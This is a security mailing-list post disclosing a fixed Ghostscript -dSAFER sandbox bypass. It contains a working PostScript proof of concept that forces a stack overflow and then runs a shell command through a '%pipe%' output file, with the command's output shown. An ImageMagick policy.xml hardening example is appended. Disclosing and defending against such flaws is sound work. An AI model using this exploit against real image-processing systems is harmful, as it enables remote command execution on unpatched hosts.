Date: Sun, 9 Sep 2018 12:27:26 -0700
From: Tavis Ormandy <taviso@...gle.com>
To: oss-security@...ts.openwall.com
Subject: Re: Re: More Ghostscript Issues: Should we disable PS coders in policy.xml by default?

[resending post that bounced]

Another update, that bypass is now fixed with these commits:

http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=3e5d316b72e3965b7968bb1d96baa137cd063ac6
http://git.ghostscript.com/?p=ghostpdl.git;a=commitdiff;h=643b24dbd002

The problem was that the previous
<http://git.ghostscript.com/?p=ghostpdl.git&a=commitdiff&h=5812b1b78fc4> commit
relied on catching any errors, then restoring a sane state in the error
handler. That won't work, because the trusted code shares the same operand
stack with untrusted code, so you can (for example) just fill it up with
junk and cause a stack overflow. That causes the stopped proc to stop,
leaving the page device in an insecure state ("stopped" is the PostScript
equivalent of "threw an exception").

Here is a test case:

%!PS
% This is bug 699718, trysetparams stopped proc can itself stop, leaving
page device in insecure state
currentpagedevice /PageSize get 0 (foobar) put
a0
% fill up the stack with junk, so the error handler generates a
/stackoverflow
0 1 300360 {} for
{ grestore } stopped clear
(ppmraw) selectdevice
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
showpage

$ ./gs -dSAFER bug699718.txt
GPL Ghostscript GIT PRERELEASE 9.25 (2018-09-03)
Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
uid=1000(taviso) gid=1000(primarygroup)

I dunno if I believe there are no other ways to make that fail, I'll think
about it. I can see there are a bunch more security related commits in git
that are not from my reports, so I guess there are more on the way anyway.

Tavis.

On Thu, Sep 6, 2018 at 9:27 AM Leonid Isaev <leonid.isaev@...a.colorado.edu>
wrote:

> On Thu, Sep 06, 2018 at 03:17:25PM +0200, Jakub Wilk wrote:
> > * Leonid Isaev <leonid.isaev@...a.colorado.edu>, 2018-09-05, 17:32:
> > > pdf files can contains things like javascript...
> >
> > Do any open-source PDF browsers actually execute embedded JS?
>
> Currently, evince, okular and gv don't. The same goes for zathura with its
> poppler backend (haven't checked this, but pretty sure). But then there is
> also
> Artifex Mupdf which, AFAIR, supports JS in pdf files (by extension, so does
> zathura when viewing a pdf file using the mupdf plugin). I don't know how
> complete that support is. Most importantly, many Android pdf/ebook readers
> probably include JS support.
>
> Cheers,
> L.
>
> --
> Leonid Isaev
>
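For readers following the policy.xml question in the subject line, this is the ImageMagick coder restriction under discussion, shown as an added example rather than text from Tavis's post or from the Ghostscript or ImageMagick projects. The file location (/etc/ImageMagick-6/policy.xml on Debian-style installs) is an assumption about the reader's system.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!-- Assumed path: /etc/ImageMagick-6/policy.xml (varies by distribution). -->
<policymap>
  <!-- Weak configuration: with no coder policy at all, any input ImageMagick
       identifies as PostScript, EPS or PDF is handed to Ghostscript, and the
       only thing standing between the file and the host is -dSAFER, which is
       exactly what the test case above gets past. -->

  <!-- Hardened configuration: deny the coders that route through Ghostscript,
       so the untrusted file is rejected before the interpreter ever runs. -->
  <policy domain="coder" rights="none" pattern="PS" />
  <policy domain="coder" rights="none" pattern="PS2" />
  <policy domain="coder" rights="none" pattern="PS3" />
  <policy domain="coder" rights="none" pattern="EPS" />
  <policy domain="coder" rights="none" pattern="PDF" />
  <policy domain="coder" rights="none" pattern="XPS" />
</policymap>
```

`identify -list policy` prints the policies ImageMagick actually loaded, which is the quickest check that the edited file was picked up.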
